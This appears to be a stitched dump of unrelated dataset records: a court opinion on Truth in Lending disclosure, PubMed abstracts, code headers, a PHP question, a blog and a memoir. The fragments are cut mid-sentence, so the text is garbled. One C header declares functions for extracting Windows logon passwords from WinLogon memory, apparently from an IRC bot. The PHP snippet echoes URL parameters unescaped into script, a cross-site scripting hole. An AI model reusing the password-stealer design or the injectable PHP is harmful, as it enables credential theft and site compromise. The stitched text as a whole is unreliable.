of nonpayment the defendant brought suit against plaintiffs in a state magistrate court in Albuquerque, New Mexico to obtain possession. ", " The Montoyas were represented by the lawyer who represents them in this action. ", " The case was set for trial. ", " The magistrate suggested that the matter be settled and the parties agreed on a last-minute settlement. ", " Thus the Credit Union agreed to dismiss the suit, and the Montoyas agreed to drop their counterclaim. ", " It was agreed that the loan would again be rewritten to include with the then principal amount the expense the Credit Union had incurred in the magistrate suit. ", " The loan was then in default. ", " The security was the house and some personal property.", "\n\n\n3\nThe stipulation for dismissal and the loan papers were prepared by the Credit Union for signature on January 19th, but they were not signed by the Montoyas until January 27th. ", " The stipulation of dismissal was filed with the magistrate on February 8th and the case was dismissed. ", " On March 30th this suit was filed.", "\n\n\n4\nThe asserted failure to disclose in the loan papers signed pursuant to the settlement of the magistrate court suit was of a provision in New Mexico law, derived from the Uniform Commercial Code, relating to after-acquired property. ", " This law provides in substance that a security interest including after-acquired property covers only such property acquired by the borrower within ten days after the lender \"gives value.\" ", " (N.M.S.A. § 55-9-204(4)(b)).", "\n\n\n5\nThus the failure to disclose asserted by the plaintiffs in this action was of this ten-day statutory limitation. ", " The fact was disclosed that the security interest covered after-acquired property, but the state law ten-day limitation was not. ", " The basic issue presented is whether this element of state law should have been disclosed. ", " It is apparent that after the ten-day period the after-acquired clause is ineffective to cover newly acquired property. ", " The disclosure statement here concerned stated, \"The Security Agreement secures future advances and covers after acquired property.\" ", " As to the after-acquired property clause under New Mexico law, there are other provisions than the ten-day limitation which are significant. ", " There are also provisions in the law directed to different types of property under the clause, and some case law.", "\n\nI.\n\n6\nIt is clear that under 15 U.S.C. § 1639(a)(8) and Regulation Z (12 C.F.R. § 226.8(b)(5)) the lender must disclose the fact that the security interest covers after-acquired property. ", " Regulation Z in part states that \"(i)f after-acquired property will be subject to the security interest . . . ", " this fact shall be clearly set forth.\" ", " (12 C.F.R. § 226.8(b)(5)). ", " The question is whether this is the extent of the obligation or whether state law variations as to the limits and effect of after-acquired property provisions under local law need also be described.", "\n\n\n7\nIn Federal Reserve Board Letter 1053 the statement is made:\n\n\n8\n\"As our previous letter indicates, a simple disclosure of the fact that after-acquired property may be subject to the security interest would be sufficient to comply with the clear language of § 226.8(b)(5), without an explanation of the various conditions and limitations on such interests which may be imposed by the applicable State law. ", " However, the fact that the creditor need not disclose such limitations and conditions does not mean that the creditor may affirmatively misstate the scope of the security interest, in disregard of those limitations. ", " If, in fact, the creditor discloses an interest in 'all after-acquired property,' when the interest would actually attach only to property acquired by the borrower within a certain period of time, such a disclosure would be inaccurate and misleading in violation of Regulation Z.\" (Emphasis supplied.)", "\n\n\n9\nAlso in Federal Reserve Board Letter 983 the position is stated in part that:\n\n\n10\n\"Staff's response indicated that the description of the security interest must accurately reflect the type of security interest that may be validly acquired under State law, in order to comply with § 226.8(b)(5). ", " Letter 829 has been interpreted to require that the 10-day limitation on after-acquired property be included in the security interest disclosure under that section.", "\n\n\n11\n\"Upon further consideration of that letter, staff believes that, to the extent that it would require a creditor to disclose limitations on after-acquired property, Letter 829 should be modified. ", " In staff's opinion, it would be sufficient, in disclosing an after-acquired property clause under § 226.8(b) (5), to state simply that the security interest covered such property, without further describing the manner and conditions under which the interest attaches. ", " We believe that this would comply with the relevant provisions in that section, which requires the creditor to clearly set forth the fact that after-acquired property will be subject to the security interest.\" ", " (Emphasis supplied.)", "\n\n\n12\nSeveral cases including Johnson v. McCrackin-Sturman Ford, Inc., 527 F.2d 257 (3d Cir.), ", "discuss the weight to be given staff letters and memos which interpret the statutes or regulations of the Board. ", " The matter would seem to be put at rest by the Court in Ford Motor Credit Co. v.Milhollin, --- U.S. ----, 100 S.Ct. ", "790, 63 L.Ed.2d 22. ", " The Court there said: \"Unless demonstrably irrational, Federal Reserve Board staff opinions construing the Act or Regulation should be dispositive for several reasons.\" ", " The Court then describes the several reasons why agency interpretation should be followed and in a footnote at 100 S.Ct. ", "797 states:\n\n\n13\n\"To be sure, the administrative interpretations proffered in this case were issued by the Federal Reserve staff rather than the Board. ", " But to the extent that deference to administrative views is bottomed on respect for agency expertise, it is unrealistic to draw a radical distinction between opinions issued under the imprimatur of the Board and those submitted as official staff memoranda. ", " See Public Information Letter No. ", "444 (1969-1974 Trans. ", " Bind.) (", "CCH) Cons.", "Cred.", "Guide P 30,640 (1971). ", " At any rate, it is unnecessary to explore the Board/staff difference at length, because Congress has conferred special status upon official staff interpretations. ", " . . . \"", "\n\n\n14\nGenerally on the Board's rule-making power, see Mourning v. Family Publications Service, Inc., 411 U.S. 356, 93 S.Ct. ", "1652, 36 L.Ed.2d 318. ", " See the \"new Act,\" Pub.", "L. 96-221.", "\n\n\n15\nIt is apparent that state law controls the consequences of the after-acquired property provision as it does most, if not all, other aspects of a transaction such as this. ", " It is not a matter of state law definition, but instead a segment of the body of state statutes and court opinions which relate to and govern credit transactions. ", " Once a requirement is made that state law consequences of a described security interest must be included in the disclosures, it is difficult to see how much should be so included. ", " It would appear that a fairly complete summary should be given, if any at all is required, in order that an understandable description for a lay person may be provided.", "\n\n\n16\nAgain, we are concerned with the description of the security interest. ", " This is what the Act and the regulation focus upon. ", " The security interest was here described as including an interest in after-acquired property and this was the fact to be disclosed. ", " The state law limitations on that security interest, and the legal consequences under different circumstances, are quite a different matter. ", " There are many statutory provisions and case law relating to real property mortgages, deeds of trust, and second deeds of trust. ", " The enforcement remedies and creditors' rights under these statutes and under the case law present a comparable problem. ", " There is just as much reason to include these elements of New Mexico law as to include the ten-day limit on after-acquired property.", "\n\n\n17\nState laws are part of the contract whether or not they are referred to in the agreement. ", " Farmers Bank v. Fed. ", "Reserve Bank, 262 U.S. 649, 43 S.Ct. ", "651, 67 L.Ed. ", "1157; Von Hoffman v. City of Quincy, 71 (4 Wall.) ", " U.S. 535, 18 L.Ed. ", "403. ", " Those for the borrowers' protection are thus included. ", " \"The law\" is not thereby \"disclosed,\" but it cannot be there described in any reasonable way. ", " In Pennino v. Morris Kirschman & Co., Inc., 526 F.2d 367, 371 (5th Cir.), ", "the Fifth Circuit stated:\n\n\n18\n\"The district court held that the Act does not require a creditor to narrate the law of the forum state, but requires simply a meaningful disclosure of the credit terms he intends to charge. ", " We agree with the district court on this point and find no violation of the Truth in Lending Act or Regulation Z.\"\n\n\n19\nThe Court in Ford Motor Credit Co. v. Milhollin, --- U.S. ----, 100 S.Ct. ", "790, 63 L.Ed.2d 22, considered the problem the creditor faces with too much disclosure, and said of this in part: \"Meaningful disclosure does not mean more disclosure.\" ", " (Emphasis supplied.) ", " The Court also indicated that the balancing between \"informational overload\" and complete disclosure is a function of the Board and staff. ", " Also, that the agency treatment of the acceleration clause disclosure, the issue there concerned, was the exercise of such a function.", "\n\n\n20\nThe balancing was done by the Act, the Board, and staff. ", " When the line is crossed, and we venture into the state law consequences of the after-acquired property clause, it would seem that if an adequate job is to be done it would necessarily create an \"informational overload.\" ", " See our recent cases Yazzie v. Reynolds, 623 F.2d 638 (10th Cir.), ", "and James v. Ford Motor Credit Co., --- F.2d ---- (10th Cir. ", "No. ", "78-1806), concerning insurance. ", " The Act requires the disclosure first of the dollars, the terms, the charges, and some of the arithmetic. ", " As the Court said in Milhollin, \"the Federal Reserve has adopted what may be termed a 'bottom-line' approach: that the most important information in a credit purchase is that which explains differing net charges and rates.\" ", " Other important information, of course, includes a factual and accurate description of the security. ", " The legal variations and permutations relating to the security need not be included. ", " The disclosure here that the security included after-acquired property was accurate and adequate under the Act.", "\n\nII.", "\n\n21\nAs a separate matter it is difficult to see how there is a case or controversy in those circumstances where the issue and the facts create nothing more than a difference of opinion on a theoretical matter. ", " It has become something of a contest between the creditors and the attorneys for the purchasers-debtors as to these abstract questions. ", " Questions which present no practical consequences as to the particular transaction and no issue as to them have arisen and in many instances cannot arise. ", " The litigation over such questions is extensive and expensive and settles no practical differences but, again, only theoretical questions. ", " This obviously is not a point relating to damages as we have held that actual damages need not be incurred, but instead is an indication of an absence of a justiciable controversy. ", " No one will argue against the enforcement of the disclosure of the elements the Court mentioned in Milhollin, a fact description of the security, and also such other elements under the Act which become a matter of real dispute between the parties and put the risk on the seller-lender. ", " The matter of comparison shopping is obviously an important factor, but realistically it is difficult to see how the presence or absence of the ten-day limitation here concerned can be of any consequence in that context.", "\n\n\n22\nThe reference to the \"bottom-line\" by the Supreme Court in Milhollin becomes very significant. ", " The courts are not prepared to give advisory opinions even though there may be a prize awarded one of the litigants.", "\n\n\n23\nThe case is REVERSED and REMANDED.", "\n\n\n24\nDOYLE, Circuit Judge, concurring.", "\n\n\n25\nI concur generally in part I of the opinion. ", " I am persuaded by the Federal Reserve Board letters which are cited in Part I of the opinion and the court authorities which are cited, particularly the decision of the Supreme Court in Ford Motor Credit Co. v. Milhollin, --- U.S. ----, 100 S.Ct. ", "790, 63 L.Ed.2d 22 (1980).", "\n\n\n26\nAs I view part II of the opinion, it is unnecessary to a decision in the case. ", " That part of the opinion criticizes the filing of litigation challenging the suit on the basis that it is not a case or controversy. ", " It says that the point raised is not a point relating to damages. ", " The opinion acknowledges that actual damages need not be incurred. ", " We have recognized this in an earlier opinion, Little Redhouse and Brady Tah., ", "etc. ", "v. Quality Ford Sales, Inc., etc. ", "and Thomas E. Redd, 523 F.2d 1 (10th Cir. ", "1975).", "\n\n\n27\nThe Congress has, in effect, authorized a lawsuit by a person who has not suffered actual damages, but this does not mean that the present plaintiff has no stake in the outcome of the case, and in the present case it is my opinion that the plaintiff does have requisite interest.", "\n\n" ]
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[ "This invention relates generally to remedial treatment for sore throat caused by bacterial or viral infection, and to remove wart (papilloma) tissue, more particularly, it concerns compositions and methods for such treatments.", "\nThere exists a long recognized need for techniques or processes which will alleviate sore throat, or will remove wart (verruca) tissue including root structure. ", "Current remedies are less than satisfactory." ]
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[ "// Created on: 1999-03-05\n// Created by: Fabrice SERVANT\n// Copyright (c) 1999 Matra Datavision\n// Copyright (c) 1999-2014 OPEN CASCADE SAS\n//\n// This file is part of Open CASCADE Technology software library.", "\n//\n// This library is free software; you can redistribute it and/or modify it under\n// the terms of the GNU Lesser General Public License version 2.1 as published\n// by the Free Software Foundation, with special exception defined in the file\n// OCCT_LGPL_EXCEPTION.txt. ", "Consult the file LICENSE_LGPL_21.txt included in OCCT\n// distribution for complete text of the license and disclaimer of any warranty.", "\n//\n// Alternatively, this file may be used under the terms of Open CASCADE\n// commercial license or contractual agreement.", "\n\n#ifndef _IntPolyh_Edge_HeaderFile\n#define _IntPolyh_Edge_HeaderFile\n\n#include <Standard.hxx>\n#include <Standard_DefineAlloc.hxx>\n#include <Standard_Handle.hxx>\n\n#include <Standard_Integer.hxx>\n\n//! ", "The class represents the edge built between the two IntPolyh points.<br>\n//! ", "It is linked to two IntPolyh triangles.", "\nclass IntPolyh_Edge\n{\npublic:\n\n DEFINE_STANDARD_ALLOC\n\n //! ", "Constructor\n IntPolyh_Edge() :\n myPoint1(-1), myPoint2(-1), myTriangle1(-1), myTriangle2(-1)\n {}\n //! ", "Constructor\n IntPolyh_Edge(const Standard_Integer thePoint1,\n const Standard_Integer thePoint2,\n const Standard_Integer theTriangle1,\n const Standard_Integer theTriangle2)\n :\n myPoint1(thePoint1),\n myPoint2(thePoint2),\n myTriangle1(theTriangle1),\n myTriangle2(theTriangle2)\n {}\n\n //! ", "Returns the first point\n Standard_Integer FirstPoint() const\n {\n return myPoint1;\n }\n //! ", "Returns the second point\n Standard_Integer SecondPoint() const\n {\n return myPoint2;\n }\n //! ", "Returns the first triangle\n Standard_Integer FirstTriangle() const\n {\n return myTriangle1;\n }\n //! ", "Returns the second triangle\n Standard_Integer SecondTriangle() const\n {\n return myTriangle2;\n }\n //! ", "Sets the first point\n void SetFirstPoint (const Standard_Integer thePoint)\n {\n myPoint1 = thePoint;\n }\n //! ", "Sets the second point\n void SetSecondPoint (const Standard_Integer thePoint)\n {\n myPoint2 = thePoint;\n }\n //! ", "Sets the first triangle\n void SetFirstTriangle (const Standard_Integer theTriangle)\n {\n myTriangle1 = theTriangle;\n }\n //! ", "Sets the second triangle\n void SetSecondTriangle (const Standard_Integer theTriangle)\n {\n myTriangle2 = theTriangle;\n }\n \n Standard_EXPORT void Dump (const Standard_Integer v) const;\n\nprotected:\n\nprivate:\n\n Standard_Integer myPoint1;\n Standard_Integer myPoint2;\n Standard_Integer myTriangle1;\n Standard_Integer myTriangle2;\n};\n\n#endif // _IntPolyh_Edge_HeaderFile\n" ]
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[ "Product is available in the stock(s) displayed in black.", "\nHK - Product's available in Hong Kong stock\nEU - Product's available in Poland stock\nCN - Product's available in China stock\nUA - Product's available in Ukraine stock\n\nNote! ", "This item is shipped within 7 working days.", "\n\nProduct evaluation option is available only for those customers, who purchased this product and filled in a questionnaire received by email after purchase." ]
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[ "/*\n * Copyright ©2018 vbill.cn.", "\n * <p>\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.", "\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "\n * See the License for the specific language governing permissions and\n * limitations under the License.", "\n * </p>\n */\n\npackage cn.vbill.middleware.porter.task.extract.extractor;\n\nimport cn.vbill.middleware.porter.core.task.setl.", "ETLBucket;\nimport cn.vbill.middleware.porter.task.extract.", "ExtractMetadata;\n\n/**\n * @author: zhangkewei[zhang_kw@suixingpay.com]\n * @date: 2017年12月25日 19:18\n * @version: V1.0\n * @review: zhangkewei[zhang_kw@suixingpay.com]/2017年12月25日 19:18\n */\npublic interface Extractor {\n /**\n * 执行顺序,数字越小越早执行\n * @return\n */\n default int order() {\n return 0;\n }\n\n /**\n * extract\n *\n * @date 2018/8/9 下午2:08\n * @param: [bucket, metadata]\n * @return: void\n */\n void extract(ETLBucket bucket, ExtractMetadata metadata);\n}\n" ]
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[ "Q:\n\nWhen solving a second order differential equation why does one get a real sin and cosine function?", "\n\nI am reading over my lecture notes for a course on differential equations and it states this:\n\nConsider the second order differential equation given by\n$L(y) = y'' +ay' +b $\nWe can write $L = D^2+aD+bI=p(D)$\nSo, $L(e^{mx})=p(m)e^{mx}$\nIf $p(m)=0$ has complex roots say $m_1 = \\alpha +\\beta i, m_2=\\alpha - \\beta i$ then two complex-valued solutions to $L(y)=0$ are\n$e^{m_1x}=e^{\\alpha x}(cos(\\beta x)+isin(\\beta x))$ and $e^{m_2x}=e^{\\alpha x}(cos(\\beta x)-isin(\\beta x))$\nHence two real-valued solutions to $L(y)=0$ are $e^{\\alpha x}cos(\\beta x)$ and $e^{\\alpha x}sin(\\beta x)$\n\nIt is the final line I don't follow. ", "The real values of $e^{m_1x}$ and $e^{m_2x}$ do not contain $sin(\\beta x)$ so why is this term included for the real-valued solution for $L(y)=0$?", "\n\nA:\n\nThis is because the general solution is a linear combination of these two particular solutions, the coefficients of which may be complex. ", "Hence the imaginary parts of the coefficients can compensate the $i$ in front of the sine and make it real.", "\nE.g.\n$$-i(\\cos+i\\sin)+i(\\cos-i\\sin),$$ which is real.", "\n\n" ]
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[ "#ifndef NO_FINDPASS\r\n\r\n#define INITIAL_ALLOCATION\t\t\t0x100 \r\n#define USER_DOMAIN_OFFSET_WINNT\t0x200 \r\n#define USER_PASSWORD_OFFSET_WINNT\t0x400 \r\n#define USER_DOMAIN_OFFSET_WIN2K\t0x400 \r\n#define USER_PASSWORD_OFFSET_WIN2K\t0x800 \r\n\r\n// Undocumented typedef's \r\ntypedef struct _QUERY_SYSTEM_INFORMATION \r\n{ \r\n\tDWORD GrantedAccess; \r\n\tDWORD PID; \r\n\tWORD HandleType; \r\n\tWORD HandleId; \r\n\tDWORD Handle; \r\n\r\n} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; \r\n\r\ntypedef struct _PROCESS_INFO_HEADER \r\n{ \r\n\tDWORD Count; \r\n\tDWORD Unk04; \r\n\tDWORD Unk08; \r\n\r\n} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; \r\n\r\ntypedef struct _PROCESS_INFO \r\n{ \r\n\tDWORD LoadAddress; \r\n\tDWORD Size; \r\n\tDWORD Unk08; \r\n\tDWORD Enumerator; \r\n\tDWORD Unk10; \r\n\tchar Name [0x108];\r\n\r\n} PROCESS_INFO, *PPROCESS_INFO; \r\n\r\ntypedef struct _ENCODED_PASSWORD_INFO \r\n{ \r\n\tDWORD HashByte; \r\n\tDWORD Unk04; \r\n\tDWORD Unk08; \r\n\tDWORD Unk0C; \r\n\tFILETIME LoggedOn; \r\n\tDWORD Unk18; \r\n\tDWORD Unk1C; \r\n\tDWORD Unk20; \r\n\tDWORD Unk24; \r\n\tDWORD Unk28; \r\n\tUNICODE_STRING EncodedPassword; \r\n\r\n} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; \r\n\r\ntypedef struct FINDPASS \r\n{\r\n\tSOCKET sock;\r\n\tchar chan[128];\r\n\tint threadnum;\r\n\tBOOL notice;\r\n\tBOOL silent;\r\n\tBOOL gotinfo;\r\n\r\n} FINDPASS;\r\n\r\n// ntdll.dll function variables\r\ntypedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); \r\ntypedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); \r\ntypedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); \r\ntypedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); \r\ntypedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); \r\n\r\nDWORD WINAPI FindPassThread(LPVOID param);\r\nDWORD FindWinLogon(void);\r\nBOOL LocatePasswordPageWinNT(DWORD WinLogonPID,PDWORD PasswordLength);\r\nBOOL LocatePasswordPageWin2K(DWORD WinLogonPID,PDWORD PasswordLength);\r\nchar *DisplayPasswordWinNT(DWORD WinLogonPID);\r\nchar *DisplayPasswordWin2K(DWORD WinLogonPID);\r\n#endif" ]
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[ "Opioids modify the release of LH at the pituitary level: in vitro studies with entire rat pituitaries.", "\nIt is currently accepted that opioids modify the secretion of LH by affecting the release of GnRH in the hypothalamus. ", "A direct action of opioids at the pituitary level is not yet fully established. ", "To this end, we tested the effects of opioids on the release of LH by the entire pituitary in adult male rats. ", "Opioid agonists with mu (DAGO), delta (DS-LET) and kappa (U-50488H) specificity were tested at 0.01 to 10 microM in static incubations. ", "DAGO inhibited dose-dependently the spontaneous and GnRH-induced release of LH. ", "DSLET inhibited only the GnRH-induced release of LH. ", "On the other hand, U-50488H increased spontaneous LH release dose-dependently. ", "The opioid antagonists naloxone, diallyl-G (delta antagonist) and MR 2266 (kappa antagonist) blocked the effects induced by DAGO, DSLET or U-50488H respectively, implying an opioid receptor-mediated effect. ", "The above results showed that opioids with mu, delta and kappa specificity act on the entire pituitary and modify differentially the release of LH. ", "In this study we also compared spontaneous and GnRH-induced LH release by anterior and entire pituitaries and found that the amount of LH released by the anterior lobe was twofold higher, suggesting that inhibitory factors present in the neurointermediate part may affect the release of LH." ]
{ "pile_set_name": "PubMed Abstracts" }
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[ { "analysis_explanation": null, "end": 442, "entity_type": "PERSON", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 438 }, { "analysis_explanation": null, "end": 553, "entity_type": "PERSON", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 549 }, { "analysis_explanation": null, "end": 634, "entity_type": "PERSON", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 629 }, { "analysis_explanation": null, "end": 834, "entity_type": "DATE_TIME", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 830 }, { "analysis_explanation": null, "end": 889, "entity_type": "PERSON", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 885 }, { "analysis_explanation": null, "end": 896, "entity_type": "PERSON", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 891 } ]
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[ "I am assuming you are talking about the men's 4 cyl. ", "class. ", "This past week there was 9 cars which was a little lower than normal in my opinion. ", "They race every other week and usually have some good racing." ]
{ "pile_set_name": "Pile-CC" }
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[ { "analysis_explanation": null, "end": 51, "entity_type": "DATE_TIME", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 46 }, { "analysis_explanation": null, "end": 74, "entity_type": "DATE_TIME", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 60 }, { "analysis_explanation": null, "end": 170, "entity_type": "DATE_TIME", "recognition_metadata": { "recognizer_identifier": "SpacyRecognizer_140094861343280", "recognizer_name": "SpacyRecognizer" }, "score": 0.85, "start": 154 } ]
[ "The Wnt/Ca2+ pathway: a new vertebrate Wnt signaling pathway takes shape.", "\nMembers of the vertebrate Wnt family have been subdivided into two functional classes according to their biological activities. ", "Some Wnts signal through the canonical Wnt-1/wingless pathway by stabilizing cytoplasmic beta-catenin. ", "By contrast other Wnts stimulate intracellular Ca2+ release and activate two kinases, CamKII and PKC, in a G-protein-dependent manner. ", "Moreover, putative Wnt receptors belonging to the Frizzled gene family have been identified that preferentially couple to the two prospective pathways in the absence of ectopic Wnt ligand and that might account for the signaling specificity of the Wnt pathways. ", "As Ca2+ release was the first described feature of the noncanonical pathway, and as Ca2+ probably plays a key role in the activation of CamKII and PKC, we have named this Wnt pathway the Wnt/Ca2+ pathway." ]
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[ "Q:\n\nHow to use php and js at the same time to filter content\n\nI'm setting up a filter bar to filter WordPress posts based on what the user selects.", "\nThe current code gives each post classes that reflect the criteria I'm targeting. ", "Let's say a post has been posted in February 2019. ", "the post will have \"FEB\", \"2019\", and its titles with \"_\" instead of spaces as additional classes.", "\nWhen the pages loads, with parameters in the URL, all the articles disappear and it will then only show the ones with the classes that match the $_GET parameters.", "\nIm using JS inside the code as well as echo statements.", "\nFor some reason it's not working, if someone can point me to the issue or give me a better alternative to this long code, that would be awesome.", "\nThanks in advance!", "\nfunction filterbar(){\n\n $current_ID =$_GET['page_id'];\n\n echo \"\n <div class='filterbar containerfluid'>\n <div class='row'>\n <div class='col-12'>\";\n\n if (get_locale() == 'en_US') {\n echo \"<form action='#' method='get'>\n <div class='dropdown'>\n <select name='month'>\n <option value='all'>By Month</option>\n <option value='Jan'>January</option>\n <option value='Feb'>February</option>\n <option value='Mar'>March</option>\n <option value='Apr'>April</option>\n <option value='May'>May</option>\n <option value='Jun'>June</option>\n <option value='Jul'>July</option>\n <option value='Aug'>August</option>\n <option value='Sep'>September</option>\n <option value='Oct'>October</option>\n <option value='Nov'>November</option>\n <option value='Dec'>December</option>\n </select>\n </div>\n <div class='dropdown'>\n <select name='year'>\n <option value='all'>By Year</option>\n <option value='2018'>2018</option>\n <option value='2019'>2019</option>\n </select>\n </div>\n <div class='dropdown'>\n <select name='category'>\n <option value='all'>All</option>\n <option value='Excise Tax'>Excise Tax</option>\n <option value='Corporate Income Tax'>Corporate Income Tax</option>\n <option value='Withholding Tax'>Withholding Tax</option>\n <option value='Tax Treaties'>Tax Treaties</option>\n </select>\n </div>\n\n <input type='text' name='page_id' value=' $current_ID ' style='display: none;'>\n\n <input type='text' name='string' value='all' placeholder='Enter keywords'>\n <input type='submit' value='Filter' class='button'></input>\n\n </form>\";\n } else {\n echo \"<form action='#' method='get'>\n <div class='dropdown'>\n <select name='month'>\n <option value='all'>شهريا</option>\n <option value='Jan'>January</option>\n <option value='Feb'>February</option>\n <option value='Mar'>March</option>\n <option value='Apr'>April</option>\n <option value='May'>May</option>\n <option value='Jun'>June</option>\n <option value='Jul'>July</option>\n <option value='Aug'>August</option>\n <option value='Sep'>September</option>\n <option value='Oct'>October</option>\n <option value='Nov'>November</option>\n <option value='Dec'>December</option>\n </select>\n </div>\n <div class='dropdown'>\n <select name='year'>\n <option value='all'>سنويا</option>\n <option value='2018'>2018</option>\n <option value='2019'>2019</option>\n </select>\n </div>\n <div class='dropdown'>\n <select name='category'>\n <option value='all'>بالتصنيف</option>\n <option value='Excise Tax'>Excise Tax</option>\n <option value='Corporate Income Tax'>Corporate Income Tax</option>\n <option value='Withholding Tax'>Withholding Tax</option>\n <option value='Tax Treaties'>Tax Treaties</option>\n </select>\n </div>\n\n <input type='text' name='page_id' value=' $current_ID ' style='display: none;'>\n\n <input type='text' name='string' value='الكل ' placeholder='Enter keywords'>\n <input type='submit' value='منقي' class='button'></input>\n\n </form>\";\n }\n\n echo \"\n </div>\n </div>\n </div>\n \";\n\n if(isset($_GET['year']) || isset($_GET['month']) || isset($_GET['string']) || isset($_GET['category']) ){\n\n if($_GET['year'] !", "= 'all' || $_GET['month'] !", "= 'all' || $_GET['string'] !", "= 'all' || $_GET['category'] !", "= 'all' ){\n echo \"\n <script>\n\n jQuery(document).ready(function($){\n\n $( 'article.pressrelease' ).hide();\n\n });\n\n </script>\n\n \";\n }\n\n if($_GET['year'] !", "= 'all'){\n\n $filteryear = $_GET['year'];\n echo \"\n <script>\n\n jQuery(document).ready(function($){\n\n if($( 'article.pressrelease' ).hasClass(\" . ", "$filteryear . \")){", "\n $( 'article.pressrelease' ).show();\n }\n\n });\n\n </script>\n \";\n }\n\n if($_GET['month'] !", "= 'all'){\n $filtermonth = $_GET['month'];\n echo \"\n <script>\n\n jQuery(document).ready(function($){\n\n if($( 'article.pressrelease' ).hasClass(\" . ", "$filtermonth . \")){", "\n $( 'article.pressrelease' ).show();\n }\n\n });\n\n </script>\n \";\n }\n\n } } add_shortcode( 'filterbarList', 'filterbar' );\n\nA:\n\nWithout knowing the exact problem that you are experiencing, the most obvious thing is you need to reference just the class that you want to show not all articles.", "\nSo change\n$( 'article.pressrelease' ).show();\n\nto\n$(.\" . ", "$filteryear . \")", ".show();\n\nAlso, that first period before the qoute is meant to be there.", "\n\n" ]
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[ "Blog Archives\n\nA number of my readers have brought to my notice that the a Counter Strike Server created using the SteamCMD is prone to crash after the first launch. ", "After finally being able to re-create the problem, I have come up with a solution.", "\n\nStep 1: Download the HLDSCrashFix.bat file and place it into the folder containing the hlds.exe file of your Counter Strike Server.", "\n\nStep 2: Run HLDSCrashFix.bat, a Command Prompt window will open that is now going to launch your Counter Strike Server in Console Read the rest of this entry →" ]
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[ "Some kids dream of becoming a rock star. ", "Others just do it. ", "Starting out as some skinny kid who talked his way to becoming the local roadie for a few Washington DC bands, Henry Rollins took the challenge and bested himself, not only becoming the bulked up lead singer for several hardcore punk bands, including the local Minor Threat and LA's Black Flag, and his own Rollins Band, but after minor roles in Hollywood film, he then landed on his feet as the host of a cable talk show.", "\n\nThere was great music ahead. ", "There was crap music to whack past as well. ", "And while I had already throttled deaf ears among the Yippies of Atlanta, I knew I'd run into another hard wall sooner of later in DC. ", "Knowing my instincts for self-regard and whatever it is about my whacked sense of social pecking order (none) that attracts trouble, it wouldn't take long.", "\n\nOne of the perks of becoming one of the elite at something is that you get to meet almost any of the elite at anything else whom you wish to meet. ", "The posted short animation—The Barely Animated Adventures of Henry Rollins: Tom Waits Story—created by Jozabad, gives us a look at two such elites meeting and sharing themselves. ", "We think you will find it hilarious, and thank Jozabad for his own creative efforts.", "\n\nBut this RSN entry is actually about my own relationship to Mr. Rollins. ", "First, a little rumor mill grist to get us started. ", "When I came upon the DC scene from Corpus Christi by way of Atlanta in the fall of 1983, I had heard of nothing of the bands or the personalities that roamed the barren streets of 1983 Washington, an urban wasteland that was barely a city, with only two neighborhoods not rolling up come dark, Georgetown and Adams Morgan, but our story takes place between 7th & E Street NW and 9th & G Street, NW, downtown. ", "Although about five years older than most of the charismatic leaders of the underground scene, I had only decided to infiltrate the punk dominion the past year or so. ", "So, although I had the gay and new wave dance scenes of Corpus Christi and the punk and gay scenes in Atlanta under my belt, I knew I had a lot of studying and many bands to experience before I knew how to navigate among the characters I would face in the coming years, plot the topography, and maybe, just maybe, escape with my life if not my dignity. ", "There was great music ahead. ", "There was crap music to whack past as well. ", "And while I had already throttled deaf ears among the Yippies of Atlanta, I knew I'd run into another hard wall sooner of later in DC. ", "Knowing my instincts for self-regard and whatever it is about my whacked sense of social pecking order (none) that attracts trouble, it wouldn't take long. ", "True to the purposeful soldier spirit in me, it didn't.", "\n\nNever a sycophant but quite commonly a fierce defender of whatever line of equality or truth it is that I think is right among equal citizens, underground or otherwise, it never takes long before someone else with a different opinion strikes a blow metaphorically or otherwise.", "\n\nThe Four Horsemen of my own experiential apocalypse, a battleground also known as DC Space and the 9:30 Club would be artists and musicians Rene the Fist, Jared Hendrickson, Bruce Merkle and our muscle of the hour—Henry Rollins, all excellent artists, all formidable agitators, all friends first before they became foes.", "\n\nExcepting Rollins.", "\n\nI can't say that we were ever friends. ", "I was introduced to him by Jack who insisted at a WUST show during the Mustard Years, followed by a quick handshake, a submissive grimace and probably a lingering brow standoff. ", "By this era I was already in the beginning stages of beer bloat, and everyone in the hall that night knew that Righteous Rollins just didn't roll that way.", "\n\nI spent my first year in my new city, my new scene buying up copies of Maximum Rock & Roll, Flipside, Truly Needy, and any smaller local street fanzines I could get into my hands. ", "I even created my own street zine called SAMPLEX, but it was decidedly more bent to the socially-tainted word and image than any 